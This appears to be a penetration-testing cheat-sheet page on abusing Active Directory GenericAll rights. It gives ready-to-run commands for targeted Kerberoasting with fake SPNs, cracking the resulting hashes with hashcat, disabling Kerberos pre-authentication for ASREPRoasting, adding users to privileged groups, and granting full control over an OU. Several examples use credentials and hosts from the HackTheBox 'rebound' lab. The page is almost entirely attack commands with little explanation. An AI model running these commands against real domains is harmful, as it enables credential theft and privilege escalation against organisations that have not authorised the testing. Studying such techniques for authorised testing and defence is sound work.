GenericAll
Over a User
Targeted Kerberoasting
targetedKerberoast extracts Kerberoast hashes by abusing write access to set temporary SPNs on users without one, then removes them. It works on all users, a list, or a single user:
targetedKerberoast.py -v -d '<domain>' -u '<user>' -p '<pass>' --request-user '<target-account>'When a group/user has GenericAll rights over another account, a fake SPN can be assigned to the target account:
# Credentialed object for the currently owned user
> $SecPass = ConvertTo-SecureString "<password>" -AsPlainText -Force
> $Cred = New-Object System.Management.Automation.PSCredential ("<domain>\<username>", $SecPass)
# Create a fake SPN for the target user
> Set-ADUser -Identity "<target-user>" -Credential $Cred -Add @{ServicePrincipalName='fake/http'}Once the SPN is assigned to the target account, we can Kerberoast it and crack its hash:
# Kerberoast the target account
impacket-GetUserSPNs <domain>\<username>:<password> -request-user <target-user> -dc-ip <dc-ip>
# Crack the hash
hashcat -m13100 fake_spn_hash /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --forceTargeted ASREPRoasting
We can disable pre-authentication for the target account and then ASREPRoast it:
# Set the preauth option to true
Set-DomainObject -Identity <USER> -XOR @{UserAccountControl=4194304}# Set the preauth option to true
Get-ADUser <USER> | Set-ADAccountControl -doesnotrequirepreauth $true
# Confirm that it worked
Get-ADUSer -Filter 'DoesNotRequirePreAuth -eq $true'An example of the above method can be found here.
Change user's password
See here.
Over a Group
Add User to the Group
This can be done using native commands, the AD PS module, or PowerView.
# connect to the DC
powerview rebound.htb/oorend:'1GR8t@$$4u'@rebound.htb -k
# add user to the group
PV > Add-DomainGroupMember -Identity servicemgmt -Members oorend
# confirm group membership
PV > Get-DomainGroupMember -Identity servicemgmt# Adding user to the group
Add-ADGroupMember -Identity '<GROUP>' -Members <USER>
# Adding user to the group (using another user's creds)
Add-DomainGroupMember -Identity 'Core Staff' -Members 'jdgodd' -Credential $Cred -Verbose
# Confirming group membership
Add-DomainGroupMember -Identity '<GROUP>' -Members '<USER>'# add user to the group
net group <GROUP> <USER> /add /domain
# confirm group membership
net group <GROUP> /domain
# Clean up by removing the account from the group
net group <GROUP> <USER> /del /domainOver an OU
If a group has GenericAll rights over an OU, then the group members can be assigned GenericAll rights over the OU as well, which results in them having FullControl over the OU members. This gives the ability to change any OU user's password.
# give oorend GenericAll rights over the Service Users OU
bloodyAD -d rebound.htb -u oorend -p '1GR8t@$$4u' --host dc01.rebound.htb add genericAll 'OU=SERVICE USERS,DC=REBOUND,DC=HTB' oorend
# confirm FullControl over OU members (winrm_svc)
powerview rebound.htb/oorend:'1GR8t@$$4u'@rebound.htb -k
PV > Get-DomainObjectAcl -Identity winrm_svc -Where "SecurityIdentifier contains oorend"Last updated
Was this helpful?